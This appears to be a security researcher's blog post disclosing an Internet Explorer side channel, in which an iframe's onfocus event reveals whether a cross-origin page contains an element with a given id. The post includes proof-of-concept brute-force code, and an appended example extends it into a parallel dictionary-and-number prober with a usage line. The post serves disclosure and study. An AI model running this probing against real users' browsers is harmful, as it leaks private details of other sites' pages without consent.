X-Domain scroll detection on IE using focus
Published: 2013年12月11日 19:13:32 GMT
Updated: 2025年3月26日 21:16:08 GMT
This is a pretty cool bug. I use the focus event on an iframe to detect whether the framed document has been scrolled cross-domain: IE fires the iframe's onfocus event when a fragment navigation scrolls the page inside it. This means that with a single network request we can discover whether a cross-origin page contains an element with a particular id, provided the page actually scrolls inside the iframe (the element has to be below the fold). Using multiple iframes you could quite easily bruteforce larger numbers, or a dictionary of words, and because only the fragment (the part after #) changes between attempts, the subsequent navigations are never sent to the target server.
First we need a page with an id we can scroll to.
<p>test</p><p>test</p><p>test</p><p>test</p><p>test</p><div id=1337>target</div>
When visiting this page with #1337 in the URL it should jump to the target element, provided the window is small enough that the element is initially out of view.
Next we create an iframe and attach an onfocus event:
<iframe src="http://hackvertor.co.uk/scroll/test.html" id="x" onfocus="alert('the iframe scrolled to:'+window.id);clearTimeout(timer)" name="x"></iframe>
Now we need to generate the clicks that change the fragment, trigger the scroll and so fire the onfocus event. A link with target="x" navigates the iframe without touching the top-level page, and the script below also expects an element with id "pos" on the attacking page to display the current counter.
id = 0; // global on purpose: the iframe's onfocus handler reads it as window.id
var anchor = document.createElement('a');
anchor.target = "x"; // navigates the iframe named "x"
document.body.appendChild(anchor);
timer = setTimeout(function f() {
  id++;
  document.getElementById('pos').innerText = id;
  // only the fragment changes, so no new request goes to the target server
  anchor.href = 'http://hackvertor.co.uk/scroll/test.html#' + id;
  anchor.click();
  if (id < 10000) {
    timer = setTimeout(f, 0);
  }
}, 0);
The function keeps rescheduling itself until it reaches 10,000 iterations or until the onfocus event fires and clears the timeout, which on IE happens at 1337 :)
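The following is an added example, not code from the original post. It generalises the loop above in the two directions the post mentions: the candidate list is a dictionary of words followed by a numeric range, and the candidates are split round-robin across several iframes that probe in parallel. The target URL is the one from the post; the `Prober` class, the function names and the `w0`, `w1`, ... frame names are assumptions made for this example. The oracle itself is the IE behaviour the post describes (the iframe's onfocus firing when a fragment navigation scrolls it); `runInBrowser` wires that up with the DOM, while `scanSync` drives the same prober with an injected `navigate` function so the probing logic can be exercised outside a browser.

```javascript
// Added example: generalised fragment-scroll oracle driver (not the post's code).
// Assumed names: TARGET_URL (from the post), Prober, probeUrl, candidates,
// partition, scanSync, runInBrowser, and frame names "w0", "w1", ...
const TARGET_URL = 'http://hackvertor.co.uk/scroll/test.html';

// Probe URL: same document, only the fragment changes, so after the first
// load of the iframe no further request reaches the target server.
function probeUrl(base, id) {
  return base.split('#')[0] + '#' + encodeURIComponent(String(id));
}

// Candidate ids: dictionary words first, then the numeric range [from, to].
function candidates(words, from, to) {
  const out = words.map(String);
  for (let n = from; n <= to; n++) out.push(String(n));
  return out;
}

// Split a candidate list round-robin across `workers` iframes.
function partition(list, workers) {
  const parts = Array.from({ length: workers }, () => []);
  list.forEach((c, i) => parts[i % workers].push(c));
  return parts;
}

// One prober drives one iframe. `navigate(url, prober)` performs the fragment
// navigation (anchor.click() in the post); `hit()` is the iframe's onfocus
// handler. After hit() the last fragment that was navigated to is the answer.
class Prober {
  constructor(list, navigate) {
    this.list = list;
    this.navigate = navigate;
    this.index = -1;
    this.current = null;
    this.found = null;
    this.done = false;
    this.probes = 0;
  }
  // Navigate to the next candidate. Returns false once finished or exhausted.
  step() {
    if (this.done) return false;
    this.index++;
    if (this.index >= this.list.length) {
      this.done = true;
      return false;
    }
    this.current = this.list[this.index];
    this.probes++;
    this.navigate(probeUrl(TARGET_URL, this.current), this);
    return !this.done;
  }
  // The iframe gained focus: the framed page scrolled, so `current` exists.
  hit() {
    if (this.done) return;
    this.found = this.current;
    this.done = true;
  }
}

// Drive a prober to completion with a synchronous navigate function.
// Returns the id that was found (or null) and how many probes it took.
function scanSync(list, navigate) {
  const p = new Prober(list, navigate);
  while (p.step()) { /* keep probing until hit() or exhaustion */ }
  return { found: p.found, probes: p.probes };
}

// Browser wiring, relying on the IE behaviour from the post: one hidden anchor
// per iframe, onfocus on the iframe reports the hit, setTimeout(..., 0) paces
// the loop so the focus event has a chance to fire between navigations.
function runInBrowser(words, from, to, workers, report) {
  partition(candidates(words, from, to), workers).forEach((list, i) => {
    const frame = document.createElement('iframe');
    frame.name = 'w' + i;          // assumed frame naming scheme
    frame.src = TARGET_URL;
    const anchor = document.createElement('a');
    anchor.target = frame.name;    // clicks navigate only this iframe
    document.body.appendChild(frame);
    document.body.appendChild(anchor);
    const prober = new Prober(list, url => { anchor.href = url; anchor.click(); });
    frame.onfocus = () => { prober.hit(); report(prober.found); };
    (function tick() { if (prober.step()) setTimeout(tick, 0); })();
  });
}
```

In a browser you would call something like `runInBrowser(['admin', 'login'], 0, 10000, 4, id => alert('found ' + id))`. The oracle only exists where the browser fires focus on the iframe for a fragment scroll, which the post observes on IE; elsewhere every prober simply runs to exhaustion with `found` still null, which is also the outcome to check for in a test of the fix.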